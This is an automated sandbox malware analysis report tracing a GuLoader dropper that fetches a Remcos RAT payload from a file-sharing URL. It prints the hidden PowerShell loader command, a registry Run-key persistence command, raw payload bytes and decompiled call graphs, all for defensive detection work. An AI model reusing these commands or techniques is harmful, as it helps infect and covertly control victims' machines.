                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GdexDysqGPV4gUJPKfF6wIBdj2lgqALx3Kd9sN2xyE4lRUNIz5YArD3ws1U%2FyjqNj4SKBmHseHpfUMfBL917RoYsFGF%2FaIC85%2FxXTtxML0%2FoI4t1Sp9sdKGklDRGNhDRL%2FI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8ec9715bceff0f37-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1468&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=828&delivery_rate=1893644&cwnd=139&unsent_bytes=0&cid=9c148d84a7b74c38&ts=928&x=0"
                                                                                          2024-12-04 05:37:09 UTC99INData Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 35 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 59 6f 38 72 79 57 67 57 5a 6e 7a 6e 22 3e 50 6c 65 61 73
                                                                                          Data Ascii: 80<h1>Redirect</h1><p><a href="https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn">Pleas
                                                                                          2024-12-04 05:37:09 UTC35INData Raw: 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a
                                                                                          Data Ascii: e click here to continue</a>.</p>
                                                                                          2024-12-04 05:37:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.549813104.21.13.1394431292C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-04 05:37:10 UTC281OUTGET /storage/download/Yo8ryWgWZnzn HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: s25.filetransfer.io
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: nette-samesite=1; PHPSESSID=eh1ak3nehcfgevvr81o68k5dsg
                                                                                          2024-12-04 05:37:11 UTC1266INHTTP/1.1 200 OK
                                                                                          Date: Wed, 04 Dec 2024 05:37:11 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 493120
                                                                                          Connection: close
                                                                                          Last-Modified: Tue, 03 Dec 2024 06:12:52 GMT
                                                                                          Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                                                          Set-Cookie: PHPSESSID=a1178d42fd2ece931f7deaa215c98155; expires=Wed, 18-Dec-2024 05:37:11 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Content-Disposition: attachment; filename="AQsUzV160.bin"
                                                                                          Accept-Ranges: bytes
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "674ea164-78640"
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YuqYVXC4hpgObjAe62m%2BAwa6aaYc3KcU9SRxxGRvVWa45viP8xJhhaouOaiDz8stxw5Kih7gmSzmLcH7xZO44zOpGZioJOZK5LCu1d2ITArVuVv7mtc9UYGk3r1AszlzYcom4oW%2F"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8ec9716a7f89c420-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1502&rtt_var=580&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=895&delivery_rate=1944074&cwnd=225&unsent_bytes=0&cid=304cf479a465cfa9&ts=1113&x=0"
                                                                                          2024-12-04 05:37:11 UTC103INData Raw: 66 4a c0 ae bd a0 da 91 41 19 2a f4 bc 10 23 61 0b 3d 75 51 51 70 aa d0 7d ce 0c a5 35 fc bf 2e f3 8f 48 4f aa cb 73 ba 8e ea 84 bb ff 04 85 2b a4 0b 94 c3 61 0f bc 72 18 0c 24 dc 87 8b 7c 02 98 b8 5b 10 fc 21 f2 ae 19 5b b0 85 46 ea 2a 65 41 f4 ba b0 bf 1e 0d c2 b8 08 ba 9c 5f 9a 07 15 c8 01 56 a2 3d e6 40
                                                                                          Data Ascii: fJA*#a=uQQp}5.HOs+ar$|[![F*eA_V=@
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: 95 b6 79 f2 ee 7f 56 8f b3 79 04 09 3b 17 2c 98 11 97 84 2f 0f 73 39 73 2b 25 eb 15 46 87 eb 03 e5 0d d7 b3 d1 97 2c 77 e6 44 94 f1 59 f4 c0 cd 1d 15 2c fe dd 8b 80 60 cd a1 2b b1 78 d4 68 d2 eb e9 15 a6 6b 66 dd e3 da 86 2e 12 36 1a c9 18 01 50 f6 bc da c5 05 e1 58 d2 5f bc b4 95 1b 26 5b 49 90 52 3b 62 e7 b0 26 43 64 4f 99 99 fd be 61 b5 45 b3 61 9c 84 9a 6d be bb 46 fc 61 d5 4b ec a6 56 dc b8 32 dc 9c a1 10 e2 92 47 6a 1e 3f 34 02 29 17 54 31 25 84 28 c3 4b f1 43 f6 06 6c b8 80 12 f1 95 c5 4b 40 be b9 75 50 f5 d1 b9 42 05 20 ca 8a 32 74 b7 ce a8 85 0b 32 1d 59 f3 03 e7 37 ca 4a ee 4b b2 f0 6c 9e 5f b9 f7 02 0b 18 72 9a 15 86 ed 8d 36 e1 8c eb 3f 23 08 82 be c7 1f a4 4d 69 8f 30 32 b8 d8 58 28 3c b5 25 80 b2 9d 1a b3 d4 ee 6b 3a 65 88 41 65 66 e4 e2 f0
                                                                                          Data Ascii: yVy;,/s9s+%F,wDY,`+xhkf.6PX_&[IR;b&CdOaEamFaKV2Gj?4)T1%(KClK@uPB 2t2Y7JKl_r6?#Mi02X(<%k:eAef
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: f3 fe 55 a8 51 5e d8 25 52 83 71 19 b8 ae 62 fa e0 09 8c 9d 04 7f 7c 1b 93 69 51 1b e6 b5 32 dd a8 26 a5 9d 05 a1 2e 7f ae e4 5c 3e 04 f6 af 6e 5c 6f 56 6f e5 65 af 44 ee 9f 31 a7 8c 81 9f b0 ab c0 66 96 40 fd 6f 6d bd e5 6e 1f 49 19 a3 c8 c7 ee 92 65 a6 e7 f6 9e 4d 1b 7d 71 58 7d 85 01 63 43 8c f7 a9 0f 49 a7 74 fb 83 e6 04 6c b6 f1 43 60 7c 32 40 37 e1 4d 1a d4 89 b0 0c cf 25 7e f8 29 44 77 e1 a1 e7 9c 7a db 1f a3 e8 14 ea 2b 61 2c 4a 40 60 27 e5 2c 22 a6 cc 90 04 1b 1e ea 1d c4 17 4f d3 3c 04 7f 13 90 29 fe fa f1 14 71 ea 3c 43 ce b4 b1 f7 e2 f5 c8 3d 64 65 a3 4a 4b e4 96 af cd ff bc a1 a7 09 df f0 53 e1 67 5f b2 6c fb 51 ae b9 b9 cf 36 ab a8 1a b1 f8 76 ea b4 3d c3 61 38 b0 27 8b a0 83 8d 13 81 62 6a 0e fe d5 66 80 29 64 90 eb 85 db 01 2d d7 8f f5 a1
                                                                                          Data Ascii: UQ^%Rqb|iQ2&.\>n\oVoeD1f@omnIeM}qX}cCItlC`|2@7M%~)Dwz+a,J@`',"O<)q<C=deJKSg_lQ6v=a8'bjf)d-
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: 6f 87 9f 1c 4d 8a c2 98 c3 3b 3b a8 da 9a c7 1f 7d 59 dd 2b fa 51 77 c9 ea 01 97 54 f5 74 4b db 5f 47 c7 ee b0 3e 8c 4c 4e 82 4f c5 c2 9d 93 2d 8b 0f 29 6f 1b 65 51 95 42 b2 9e fd 89 ca 86 a2 f9 f4 f5 fa f7 03 6c b9 10 ef 2b 79 d4 b6 88 34 96 3b 6b 62 5f ce 74 a8 cc 68 ef 86 43 1d 05 05 2c 79 eb 66 4d 5a c3 59 47 f5 da c9 9b d6 47 9a 69 fc 07 62 e2 a8 e2 18 3a af af 55 99 e5 ee 3e 74 1e 84 67 d4 c3 69 33 3a 81 5c e7 9c f7 34 9c 28 69 8a 37 44 a9 c6 d2 57 90 4c 81 6d 34 e2 ac 5f 0c 88 32 f0 15 b3 7b da 96 8c a5 5a 5c 3b 08 ab 8b e3 39 ab 04 2a 38 12 4a 93 34 87 3b 11 5b 59 f2 21 81 ce ca 07 6e 90 2c df 1c d4 b7 a6 c2 d2 e0 95 87 e6 b3 a8 d7 5f 6b 6d be 36 36 03 30 17 fc 64 6f 10 50 66 51 f9 28 1f a1 c8 1d 5a 01 3e 79 e4 82 da 6c 84 6c 09 f6 a9 7d 6a 8d 98
                                                                                          Data Ascii: oM;;}Y+QwTtK_G>LNO-)oeQBl+y4;kb_thC,yfMZYGGib:U>tgi3:\4(i7DWLm4_2{Z\;9*8J4;[Y!n,_km660doPfQ(Z>yll}j
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: db 33 9f e7 96 a3 a1 f7 aa 56 2a fe ae 84 79 7a 5a b7 15 45 fd b2 c9 c9 90 cd 68 be eb c1 34 3a 43 75 e6 b2 e0 39 b5 9a 79 76 ec 8f 21 e8 4a c5 53 c7 3d 2c 91 4c 3b 6e 26 4f 2b e8 7f 81 f7 b4 30 d4 16 e0 e5 98 77 fe d3 e4 93 b6 14 82 6b c8 1a 22 eb 1c 80 37 ed 87 e0 5f b9 82 a8 74 55 b1 6e e3 c1 24 5d 4c 13 87 3d 2f e5 d8 24 5f 22 13 cf 86 b6 48 01 d3 c9 b3 16 59 02 e9 89 e5 36 ac 07 b4 2c 86 ba 02 02 a7 f7 f7 e6 9a a6 db 78 b8 71 5b ff 1a 07 f5 77 2e 05 84 bc ad ed f3 ae b0 22 25 25 bc 2b 98 e3 71 50 ae d7 ee be ad 13 bc b7 e1 d9 35 7b ad 16 8f 3a a5 9b 54 ca ca fd 13 00 82 8c 51 60 f9 7a bc b6 b0 97 a5 77 fd 97 46 83 fa fa db d3 6d f3 8c 1c 7c 14 87 46 25 3d 3c 00 b3 7e 22 b6 a5 84 d1 16 fa 62 e4 a7 c4 17 c9 66 b6 b4 a5 07 21 dd 33 30 2b 16 b2 57 25 8b
                                                                                          Data Ascii: 3V*yzZEh4:Cu9yv!JS=,L;n&O+0wk"7_tUn$]L=/$_"HY6,xq[w."%%+qP5{:TQ`zwFm|F%=<~"bf!30+W%
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: c5 ed 7d 5d 2e 76 52 49 e4 90 aa 27 1d 89 dd 0a 9f 53 69 5a be 4f 12 92 cd c0 6f 7e 9a 65 66 69 d6 9c c8 54 5a 45 68 0b c7 c3 5b d9 1f 66 d4 c4 67 c5 13 01 bd f3 64 91 2f a9 19 48 18 82 05 4a 98 92 a2 20 ad ab 58 a0 e4 00 a1 0e 3b cd 1d e8 a8 eb 9f b6 f7 ba 91 ca 98 b7 9f f2 98 01 34 d5 8d 73 52 a0 c6 7c 25 ad 96 b4 da 10 24 2d 29 e6 f2 12 e9 68 72 81 3b 58 e4 1d 08 46 9d f7 09 d4 dd a9 c6 84 14 b2 6e f7 44 fb 38 1f a5 58 ea ef 6c 33 7a 98 27 b6 18 d2 25 68 2a 6e e5 4c 8d b7 42 f9 32 02 a6 35 3e 1c 52 6e f8 8e 6c 2c b7 96 5a 70 c0 91 93 97 1e 48 39 7c 15 c6 ef c9 36 dc 0b 79 60 03 24 a9 1e 97 af 24 2e 46 8c 29 2d e0 59 81 2b d4 50 ef 85 22 74 34 e4 5c fe c0 fd 5f d2 c0 fb 64 b2 2b b4 03 d6 4e 92 da 45 15 45 76 63 87 20 73 9e d7 8d 65 36 e2 fe c7 59 33 1c
                                                                                          Data Ascii: }].vRI'SiZOo~efiTZEh[fgd/HJ X;4sR|%$-)hr;XFnD8Xl3z'%h*nLB25>Rnl,ZpH9|6y`$$.F)-Y+P"t4\_d+NEEvc se6Y3
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: ef 74 4c 83 e3 84 d7 64 94 dd 9f ca bc 9b 6d f4 84 87 27 33 6f 39 19 bc 30 5d 1c bc c6 e6 db 48 bd 95 4e f2 0a c9 94 18 24 54 1f 55 72 56 16 38 fc 25 cd b9 e9 a3 c5 a7 17 c2 ec 93 58 6e 20 37 8c a4 2c ca 77 b3 51 0c 42 56 17 f1 8e 36 c4 33 9e 4c 5b 17 9e 69 9b 7c 18 c0 ed 33 c0 aa 88 99 f7 18 19 18 62 7f 7d aa 28 1e 07 3f 70 ae e9 13 6b 8d 9f 01 89 71 28 7a 77 4d e4 0f b0 0c 77 ee 5a df b3 44 ad f2 f7 55 b8 61 1d 16 fe b2 84 08 ac 1f bb 9a a6 e3 62 4a ef 3c 05 c2 a9 9d ec 12 e1 a3 f3 4f cb 6f d7 67 a9 f2 95 aa 43 e3 3e 14 58 68 78 29 f6 f5 7f 30 5e 55 82 ae 47 c1 a1 92 81 93 6c 09 49 e3 eb 32 2c 87 ff e1 30 30 22 a6 fa 42 70 d3 bd 37 46 d3 6b 2a d7 14 d2 2c 07 92 cd 45 b9 e8 98 eb 58 1c 0e 90 19 89 0e 1c d7 8a 7a 28 dc 74 13 26 63 b8 82 57 85 28 76 5e a1
                                                                                          Data Ascii: tLdm'3o90]HN$TUrV8%Xn 7,wQBV63L[i|3b}(?pkq(zwMwZDUabJ<OogC>Xhx)0^UGlI2,00"Bp7Fk*,EXz(t&cW(v^
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: 4b b3 18 6d 12 cf 5a 0b d9 6c 98 6b b6 0a dd 0f 95 84 a5 26 d7 cd d2 10 83 33 63 64 de 15 e9 ba d0 63 5f 3a c5 04 03 52 3e e1 88 aa 02 4a 32 d7 ed e7 30 50 0a cc 51 ae 58 08 36 28 d5 1d 58 76 1c 8e 75 91 bb 8d 3b 51 9f fb 21 5b 96 09 d6 08 c3 b1 73 d9 4d fa 82 5d 0b 05 a5 13 74 81 e1 24 04 c1 3a e7 a3 72 9a 15 be 15 0d e4 02 d0 d1 98 1e b1 67 23 59 2b 1c 72 49 e9 99 d2 df f6 d2 df 88 72 c8 b8 3e 7e aa aa f2 50 25 d1 e0 3a 87 35 9e 9a 24 a8 2e 9c d7 30 6e 83 06 3e f0 31 d7 3d 56 b9 95 01 85 b4 72 de 64 7f 4e c5 01 bf bc eb db 52 1e 53 13 8d e1 22 db 4d 77 f3 6f 65 e1 74 25 a1 78 df 38 d9 04 46 dd 29 98 90 62 54 50 8a 1e 26 30 79 0d a0 08 3c 85 40 e7 37 0f 47 bf f1 ee ea 59 e0 99 ea 6d c8 9b a0 93 8c ad ab 66 4d 19 0f 9b 50 d1 51 bd 50 ef 33 16 b5 e1 a6 b3
                                                                                          Data Ascii: KmZlk&3cdc_:R>J20PQX6(Xvu;Q![sM]t$:rg#Y+rIr>~P%:5$.0n>1=VrdNRS"Mwoet%x8F)bTP&0y<@7GYmfMPQP3
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: e1 05 d3 c4 f2 ac c5 07 2f 3b 82 6e a3 a2 60 e5 9a 8e cc 90 ea 21 af 84 d7 13 4e 80 d6 92 0d 00 d5 f4 59 cf f6 55 37 1a 17 48 44 a8 1f f7 6d 61 af bc 38 80 58 79 25 8a 0d 12 b8 77 58 cb 85 18 8b fe d7 65 84 bf 35 33 48 5c ca 19 59 16 f9 3c 0e 02 bc b1 eb dc 41 a8 15 13 95 56 8d 70 51 d4 41 cd 9e 76 b1 0d 1f e4 a6 cd b3 7b 0f 0d 12 7f 04 5d e3 00 09 c5 81 ac 75 43 4d 02 f8 fc 41 b7 29 2e e2 29 a6 00 4b f2 96 95 3c 85 8c 29 47 85 62 6f 7e f7 3e 21 29 ec 0e 13 b5 9a a6 8e 28 8e 5e a9 cf 03 9d 81 89 8e 27 af 26 62 3a c6 f6 2c 57 52 88 bb 39 42 33 fa 62 fd 9e c1 58 40 f2 ea 13 ef e4 93 02 b4 63 3c 78 bb c5 7c 19 5c 6c 5d 93 44 6f 5e d7 c2 ad 8c bf db 6e d4 7d bd 0c d2 81 9c 5e a3 48 16 fe 70 32 a7 8c ab b8 e9 1e 55 e6 f4 c1 ce 21 0c 59 43 dc 84 1e 9a d7 9f b2
                                                                                          Data Ascii: /;n`!NYU7HDma8Xy%wXe53H\Y<AVpQAv{]uCMA).)K<)Gbo~>!)(^'&b:,WR9B3bX@c<x|\l]Do^n}^Hp2U!YC
                                                                                          2024-12-04 05:37:11 UTC1369INData Raw: 51 4d 8f 4c ff 12 b6 bc 92 05 4e 40 16 42 aa 69 d5 69 26 09 4b 32 ce cd 14 93 94 bc fb a0 df a9 66 33 8a 73 ab 34 72 37 83 6c c1 11 5e b1 00 fb b6 50 1c 7d ca e3 3f 1c ab b7 70 83 b0 c1 fc 27 b1 93 2a 7c 7f c6 b9 36 4c a0 ca a7 c5 13 ad 56 16 40 7f d1 c6 ef f4 39 a6 40 42 47 d8 79 05 a1 ae a4 3c 7d d1 75 5d 4b 56 d0 63 a4 2c 4e e4 23 3b 12 e3 14 59 57 91 46 00 09 b3 5d 3f 7c a5 56 f8 8a 98 af eb 3f d7 9d c0 33 2b 1e db f9 cd 2e 55 67 14 0f e3 3d 76 2e f5 ba d6 c2 87 a6 3a 46 90 45 29 7f 3d ae 79 01 9c 1d 31 66 04 f0 ad d1 88 29 84 fc a0 60 5e 9d 0a 61 59 16 15 21 c7 68 6c 60 e2 0a b4 93 40 e0 bc ff a3 7f 79 8f e8 e4 58 4a f7 32 49 e5 2a e0 ab b8 e3 17 cd 32 94 d4 a8 4f b7 68 98 eb 6a 90 18 1a d5 c3 82 45 4d f1 3c be db e3 04 4c 53 fa 06 e1 7f 3c b2 11 5d
                                                                                          Data Ascii: QMLN@Bii&K2f3s4r7l^P}?p'*|6LV@9@BGy<}u]KVc,N#;YWF]?|V?3+.Ug=v.:FE)=y1f)`^aY!hl`@yXJ2I*2OhjEM<LS<]


                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:00:36:00
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:798'379 bytes
                                                                                          MD5 hash:935BDB714D2C6A118E9C6BFD941084B8
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:00:36:01
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)"
                                                                                          Imagebase:0xa60000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2617447888.000000000A528000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:00:36:01
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:00:36:56
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                          Imagebase:0xe10000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:7
                                                                                          Start time:00:37:05
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"
                                                                                          Imagebase:0x790000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:8
                                                                                          Start time:00:37:05
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:9
                                                                                          Start time:00:37:05
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"
                                                                                          Imagebase:0x620000
                                                                                          File size:59'392 bytes
                                                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:10
                                                                                          Start time:00:37:22
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kyeljthgepgkbumddfxbvgcpb"
                                                                                          Imagebase:0xe10000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:11
                                                                                          Start time:00:37:22
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\nsjeklaasxzpdjihuqsuylwgkeqq"
                                                                                          Imagebase:0xe10000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:00:37:22
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xmowlwlbgfrcopwtdaewjyjptlizvdg"
                                                                                          Imagebase:0xe10000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:19%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:17.2%
                                                                                            Total number of Nodes:1372
                                                                                            Total number of Limit Nodes:32
                                                                                            execution_graph 3997 402643 3998 402672 3997->3998 3999 402657 3997->3999 4000 4026a2 3998->4000 4001 402677 3998->4001 4014 402d89 3999->4014 4004 402dab 21 API calls 4000->4004 4003 402dab 21 API calls 4001->4003 4005 40267e 4003->4005 4006 4026a9 lstrlenW 4004->4006 4017 406543 WideCharToMultiByte 4005->4017 4009 40265e 4006->4009 4008 402692 lstrlenA 4008->4009 4010 4026d6 4009->4010 4012 4026ec 4009->4012 4018 4060f2 SetFilePointer 4009->4018 4011 4060c3 WriteFile 4010->4011 4010->4012 4011->4012 4015 40655e 21 API calls 4014->4015 4016 402d9e 4015->4016 4016->4009 4017->4008 4019 40610e 4018->4019 4026 406126 4018->4026 4020 406094 ReadFile 4019->4020 4021 40611a 4020->4021 4022 406157 SetFilePointer 4021->4022 4023 40612f SetFilePointer 4021->4023 4021->4026 4022->4026 4023->4022 4024 40613a 4023->4024 4025 4060c3 WriteFile 4024->4025 4025->4026 4026->4010 3577 401946 3578 401948 3577->3578 3579 402dab 21 API calls 3578->3579 3580 40194d 3579->3580 3583 405c2d 3580->3583 3622 405ef8 3583->3622 3586 405c55 DeleteFileW 3588 401956 3586->3588 3587 405c6c 3589 405d97 3587->3589 3636 406521 lstrcpynW 3587->3636 3589->3588 3596 40687e 2 API calls 3589->3596 3591 405c92 3592 405ca5 3591->3592 3593 405c98 lstrcatW 3591->3593 3637 405e3c lstrlenW 3592->3637 3594 405cab 3593->3594 3597 405cbb lstrcatW 3594->3597 3600 405cc6 lstrlenW FindFirstFileW 3594->3600 3598 405db1 3596->3598 3597->3600 3598->3588 3599 405db5 3598->3599 3601 405df0 3 API calls 3599->3601 3602 405d8c 3600->3602 3603 405ce8 3600->3603 3604 405dbb 3601->3604 3602->3589 3605 405d6f FindNextFileW 3603->3605 3615 405c2d 64 API calls 3603->3615 3617 4055a6 28 API calls 3603->3617 3620 4055a6 28 API calls 3603->3620 3641 406521 lstrcpynW 3603->3641 3642 405be5 3603->3642 3650 4062e1 MoveFileExW 3603->3650 3606 405be5 5 API calls 3604->3606 3605->3603 3609 405d85 FindClose 3605->3609 3608 405dc7 3606->3608 3610 405de1 3608->3610 3611 405dcb 3608->3611 3609->3602 3613 4055a6 28 API calls 3610->3613 3611->3588 3614 4055a6 28 API calls 3611->3614 3613->3588 3616 405dd8 3614->3616 3615->3603 3618 4062e1 40 API calls 3616->3618 3617->3605 3619 405ddf 3618->3619 3619->3588 3620->3603 3654 406521 lstrcpynW 3622->3654 3624 405f09 3655 405e9b CharNextW CharNextW 3624->3655 3627 405c4d 3627->3586 3627->3587 3628 4067cf 5 API calls 3634 405f1f 3628->3634 3629 405f50 lstrlenW 3630 405f5b 3629->3630 3629->3634 3632 405df0 3 API calls 3630->3632 3631 40687e 2 API calls 3631->3634 3633 405f60 GetFileAttributesW 3632->3633 3633->3627 3634->3627 3634->3629 3634->3631 3635 405e3c 2 API calls 3634->3635 3635->3629 3636->3591 3638 405e4a 3637->3638 3639 405e50 CharPrevW 3638->3639 3640 405e5c 3638->3640 3639->3638 3639->3640 3640->3594 3641->3603 3643 405fec 2 API calls 3642->3643 3644 405bf1 3643->3644 3645 405c12 